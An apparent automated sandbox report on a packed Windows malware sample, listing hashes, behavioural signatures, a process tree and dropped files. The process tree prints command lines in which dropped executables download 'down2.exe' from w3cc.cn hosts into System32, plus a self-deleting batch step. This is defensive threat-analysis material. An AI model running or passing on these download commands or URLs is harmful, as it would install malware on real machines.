Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system
  • submitted
    29/02/2024, 06:45

General

  • Target
    adf042c909d919ccca72d1bcf7338e71.exe
  • Size
    175KB
  • MD5
    adf042c909d919ccca72d1bcf7338e71
  • SHA1
    bf9be4f139b3742d94593f3079f1f8836e5f5bb4
  • SHA256
    71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
  • SHA512
    d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173
  • SSDEEP
    3072:C5YS+FskKww99rNeht/ry7LOp9NxTzW8U6Ao1Tcfk8BIo8/qDjrlXZ4EhNWwH:CSvVtw/Ijy7SpPn7LFSjrlXZ4E1

Score
7/10

Malware Config

Signatures

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Drops file in System32 directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe
    "C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"
    1⤵
    • Checks computer location settings
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:2700
    • C:\Windows\SysWOW64\SOupMF.exe
      "C:\Windows\system32\SOupMF.exe" showautoC:\Windows\system32\RQYknvIR.dll
      2⤵
      • Executes dropped EXE
      PID:3060
    • C:\Windows\SysWOW64\DMWgpy.exe
      "C:\Windows\system32\DMWgpy.exe" C:\Windows\system32\JSNVfa2.exe http://x2.w3cc.cn/dw/down2.exe
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:3096
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4372
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 5 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:400
    • C:\Windows\SysWOW64\xBjOcu.exe
      "C:\Windows\system32\xBjOcu.exe" C:\Windows\system32\vEzIRa2.exe http://x3.w3cc.cn/dw/down2.exe
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:3884
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2060
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 5 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:1928
    • C:\Windows\SysWOW64\RMsoSA.exe
      "C:\Windows\system32\RMsoSA.exe" C:\Windows\system32\DyeLGo2.exe http://x4.w3cc.cn/dw/down2.exe
      2⤵
      • Executes dropped EXE
      PID:3108
    • C:\Windows\SysWOW64\eytYFB.exe
      "C:\Windows\system32\eytYFB.exe" C:\Windows\system32\sFAvzS2.exe http://x3.w3cc.cn/dw/down2.exe
      2⤵
      • Executes dropped EXE
      PID:5104

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Windows\SysWOW64\DMWgpy.exe
    Filesize
    35KB
    MD5
    78cd588e48bf05f83ac4d2e5bd3d32e2
    SHA1
    c96060325a397b397a1d60076ce6e2c11f309a4f
    SHA256
    5309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e
    SHA512
    8cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65
  • C:\Windows\SysWOW64\DelCAD.bat
    Filesize
    141B
    MD5
    544926ed36528740dfc1d64a602e6d5c
    SHA1
    7837ae9e7da6054b79b1f1cbe810d838ed0ee3c5
    SHA256
    6e7bd49e44ffa47502cceb6fcf39dcb048d716cbe9f95b360c145b5fea64eec7
    SHA512
    8425d3c4282b576878c5ecc2a327634399338e626fd738192d2c766f8ecfa7f4bf539b476757c9174f111b6b7d108a39f90aaffcdc4b93ffda65b5594cb7210b
  • C:\Windows\SysWOW64\DelCAD.bat
    Filesize
    141B
    MD5
    9c439a87b83755cde8511cf65e13e54e
    SHA1
    a72df147498f15d16d4004f73733d2602390e981
    SHA256
    d7c7639aa7fbe036c11bf35908fb2aa26171902482bb250233af19cd8f655bf3
    SHA512
    c483a77a2496f2daca73613be8a317c6fbf92de9cb569a0dd75a27f30fa4d6f251a4a1d26e3808716128cf4f48c72cbd81b5380c9b2d981be9be300eb49155eb
  • C:\Windows\SysWOW64\SOupMF.exe
    Filesize
    175KB
    MD5
    adf042c909d919ccca72d1bcf7338e71
    SHA1
    bf9be4f139b3742d94593f3079f1f8836e5f5bb4
    SHA256
    71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
    SHA512
    d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173
  • memory/3096-17-0x0000000000400000-0x0000000000418000-memory.dmp
    Filesize
    96KB
  • memory/3096-49-0x0000000000400000-0x0000000000418000-memory.dmp
    Filesize
    96KB
  • memory/3108-52-0x0000000000400000-0x0000000000418000-memory.dmp
    Filesize
    96KB
  • memory/3884-31-0x0000000000400000-0x0000000000418000-memory.dmp
    Filesize
    96KB
  • memory/3884-70-0x0000000000400000-0x0000000000418000-memory.dmp
    Filesize
    96KB
  • memory/5104-73-0x0000000000400000-0x0000000000418000-memory.dmp
    Filesize
    96KB